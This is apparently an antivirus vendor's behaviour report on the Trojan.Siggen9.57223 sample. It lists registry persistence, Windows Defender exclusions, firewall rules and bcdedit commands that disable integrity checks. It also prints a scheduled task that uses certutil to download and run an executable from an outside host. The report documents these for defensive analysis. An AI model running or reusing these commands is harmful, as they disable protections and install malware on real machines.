Trojan.Siggen9.57223

Technical Information

To ensure autorun and distribution

Modifies the following registry keys

[<HKCU>\Software\Microsoft\Windows\CurrentVersion\Run] 'AncientForest' = '"%WINDIR%\rss\csrss.exe"'

Creates or modifies the following files

<SYSTEM32>\tasks\scheduledupdate
<SYSTEM32>\tasks\csrss

Malicious functions

To complicate detection of its presence in the operating system,

adds antivirus exclusion with following registry keys:

[<HKLM>\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths] '%WINDIR%' = '00000000'
[<HKLM>\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths] '%WINDIR%\rss' = '00000000'
[<HKLM>\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths] '%APPDATA%\8edad8e8feee\8edad8e8feee' = '00000000'
[<HKLM>\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths] '%TEMP%\csrss' = '00000000'
[<HKLM>\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths] '%APPDATA%\AncientForest' = '00000000'
[<HKLM>\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths] '%WINDIR%\windefender.exe' = '00000000'
[<HKLM>\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths] '%TEMP%\wup' = '00000000'
[<HKLM>\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths] '<DRIVERS>' = '00000000'
[<HKLM>\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes] 'csrss.exe' = '00000000'
[<HKLM>\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes] '8edad8e8feee.exe' = '00000000'
[<HKLM>\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes] 'windefender.exe' = '00000000'
[<HKLM>\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes] '<File name>.exe' = '00000000'

Executes the following

'<SYSTEM32>\netsh.exe' advfirewall firewall add rule name="csrss" dir=in action=allow program="%WINDIR%\rss\csrss.exe" enable=yes
'<SYSTEM32>\netsh.exe' advfirewall firewall add rule name="CloudNet" dir=in action=allow program="%APPDATA%\8edad8e8feee\8edad8e8feee\8edad8e8feee.exe" enable=yes

Modifies file system

Creates the following files

%WINDIR%\rss\csrss.exe
nul
%TEMP%\csrss\patch.exe
%TEMP%\dbghelp.dll
%TEMP%\symsrv.dll
%TEMP%\ntkrnlmp.exe
%TEMP%\osloader.exe
%TEMP%\symbols\ntkrnlmp.pdb\3844dbb920174967be7aa4a2c20430fa2\download.error

Deletes the following files

%TEMP%\csrss\patch.exe

Moves the following files

from %TEMP%\symbols\ntkrnlmp.pdb\3844dbb920174967be7aa4a2c20430fa2\download.error to %TEMP%\symbols\ntkrnlmp.pdb\3844dbb920174967be7aa4a2c20430fa2\ntkrnlmp.pdb
from %TEMP%\ntkrnlmp.exe to <SYSTEM32>\ntkrnlmp.exe
from %TEMP%\osloader.exe to <SYSTEM32>\osloader.exe

Substitutes the following files

%TEMP%\symbols\ntkrnlmp.pdb\3844dbb920174967be7aa4a2c20430fa2\download.error

Network activity

TCP

HTTP GET requests

http://oc##.#tartssl.com/sub/class2/code/ca/MEMwQTA%2FMD0wOzAJBgUrDgMCGgUABBQSOgrhRCSnWfKxoWTjWxhk8hga9AQU0E4PQJlsuEsZbzsouODjiAc0qrcCAhAV

'b6###############c-aece-194c45d6bfc9.server1.easywbdesign.com':443

'msdl.microsoft.com':443

'vs###########ssu5shard10.blob.core.windows.net':443

UDP

DNS ASK b6###############c-aece-194c45d6bfc9.server1.easywbdesign.com
DNS ASK msdl.microsoft.com
DNS ASK vs###########ssu5shard10.blob.core.windows.net
DNS ASK oc##.#tartssl.com

Miscellaneous

Creates and executes the following

'%WINDIR%\rss\csrss.exe' ""
'%TEMP%\csrss\patch.exe'
'<SYSTEM32>\cmd.exe' /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="%WINDIR%\rss\csrss.exe" enable=yes"' (with hidden window)
'<SYSTEM32>\bcdedit.exe' -timeout 0' (with hidden window)
'<SYSTEM32>\bcdedit.exe' -displayorder {71A3C7FC-F751-4982-AEC1-E958357E6813} -addlast' (with hidden window)
'<SYSTEM32>\bcdedit.exe' -set {71A3C7FC-F751-4982-AEC1-E958357E6813} inherit {bootloadersettings}' (with hidden window)
'<SYSTEM32>\bcdedit.exe' -set {71A3C7FC-F751-4982-AEC1-E958357E6813} nointegritychecks 1' (with hidden window)
'<SYSTEM32>\bcdedit.exe' -set {71A3C7FC-F751-4982-AEC1-E958357E6813} nx OptIn' (with hidden window)
'<SYSTEM32>\bcdedit.exe' -set {71A3C7FC-F751-4982-AEC1-E958357E6813} recoveryenabled 0' (with hidden window)
'<SYSTEM32>\bcdedit.exe' -set {71A3C7FC-F751-4982-AEC1-E958357E6813} kernel ntkrnlmp.exe' (with hidden window)
'<SYSTEM32>\bcdedit.exe' -set {71A3C7FC-F751-4982-AEC1-E958357E6813} path \Windows\system32\osloader.exe' (with hidden window)
'<SYSTEM32>\bcdedit.exe' -set {71A3C7FC-F751-4982-AEC1-E958357E6813} osdevice partition=C:' (with hidden window)
'<SYSTEM32>\bcdedit.exe' -default {71A3C7FC-F751-4982-AEC1-E958357E6813}' (with hidden window)
'<SYSTEM32>\bcdedit.exe' -set {71A3C7FC-F751-4982-AEC1-E958357E6813} device partition=C:' (with hidden window)
'<SYSTEM32>\bcdedit.exe' -create {71A3C7FC-F751-4982-AEC1-E958357E6813} -d "Windows Fast Mode" -application OSLOADER' (with hidden window)
'%TEMP%\csrss\patch.exe' ' (with hidden window)
'<SYSTEM32>\schtasks.exe' /CREATE /SC ONLOGON /RL HIGHEST /RU SYSTEM /TR "cmd.exe /C certutil.exe -urlcache -split -f https://gfixprice.space/app/app.exe %TEMP%\csrss\scheduled.exe && %TEMP%\csrss\scheduled.exe /31340" ...' (with hidden window)
'<SYSTEM32>\schtasks.exe' /CREATE /SC ONLOGON /RL HIGHEST /TR "%WINDIR%\rss\csrss.exe" /TN csrss /F' (with hidden window)
'%WINDIR%\rss\csrss.exe' ""' (with hidden window)
'<SYSTEM32>\cmd.exe' /C "netsh advfirewall firewall add rule name="CloudNet" dir=in action=allow program="%APPDATA%\8edad8e8feee\8edad8e8feee\8edad8e8feee.exe" enable=yes"' (with hidden window)
'<SYSTEM32>\bcdedit.exe' -set {71A3C7FC-F751-4982-AEC1-E958357E6813} systemroot \Windows' (with hidden window)
'<SYSTEM32>\bcdedit.exe' /v' (with hidden window)

Executes the following

'<SYSTEM32>\cmd.exe' /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="%WINDIR%\rss\csrss.exe" enable=yes"
'<SYSTEM32>\bcdedit.exe' -timeout 0
'<SYSTEM32>\bcdedit.exe' -displayorder {71A3C7FC-F751-4982-AEC1-E958357E6813} -addlast
'<SYSTEM32>\bcdedit.exe' -set {71A3C7FC-F751-4982-AEC1-E958357E6813} inherit {bootloadersettings}
'<SYSTEM32>\bcdedit.exe' -set {71A3C7FC-F751-4982-AEC1-E958357E6813} nointegritychecks 1
'<SYSTEM32>\bcdedit.exe' -set {71A3C7FC-F751-4982-AEC1-E958357E6813} nx OptIn
'<SYSTEM32>\bcdedit.exe' -set {71A3C7FC-F751-4982-AEC1-E958357E6813} recoveryenabled 0
'<SYSTEM32>\bcdedit.exe' -set {71A3C7FC-F751-4982-AEC1-E958357E6813} kernel ntkrnlmp.exe
'<SYSTEM32>\bcdedit.exe' -set {71A3C7FC-F751-4982-AEC1-E958357E6813} path \Windows\system32\osloader.exe
'<SYSTEM32>\bcdedit.exe' -set {71A3C7FC-F751-4982-AEC1-E958357E6813} systemroot \Windows
'<SYSTEM32>\bcdedit.exe' -set {71A3C7FC-F751-4982-AEC1-E958357E6813} osdevice partition=C
'<SYSTEM32>\bcdedit.exe' -set {71A3C7FC-F751-4982-AEC1-E958357E6813} device partition=C
'<SYSTEM32>\bcdedit.exe' -create {71A3C7FC-F751-4982-AEC1-E958357E6813} -d "Windows Fast Mode" -application OSLOADER
'<SYSTEM32>\schtasks.exe' /CREATE /SC ONLOGON /RL HIGHEST /RU SYSTEM /TR "cmd.exe /C certutil.exe -urlcache -split -f https://gfixprice.space/app/app.exe %TEMP%\csrss\scheduled.exe && %TEMP%\csrss\scheduled.exe /31340" ...
'<SYSTEM32>\schtasks.exe' /CREATE /SC ONLOGON /RL HIGHEST /TR "%WINDIR%\rss\csrss.exe" /TN csrss /F
'<SYSTEM32>\cmd.exe' /C "netsh advfirewall firewall add rule name="CloudNet" dir=in action=allow program="%APPDATA%\8edad8e8feee\8edad8e8feee\8edad8e8feee.exe" enable=yes"
'<SYSTEM32>\bcdedit.exe' -default {71A3C7FC-F751-4982-AEC1-E958357E6813}
'<SYSTEM32>\bcdedit.exe' /v

Technologies

Terminology

Training and education

Myths

Technical Information

Curing recommendations

Free trial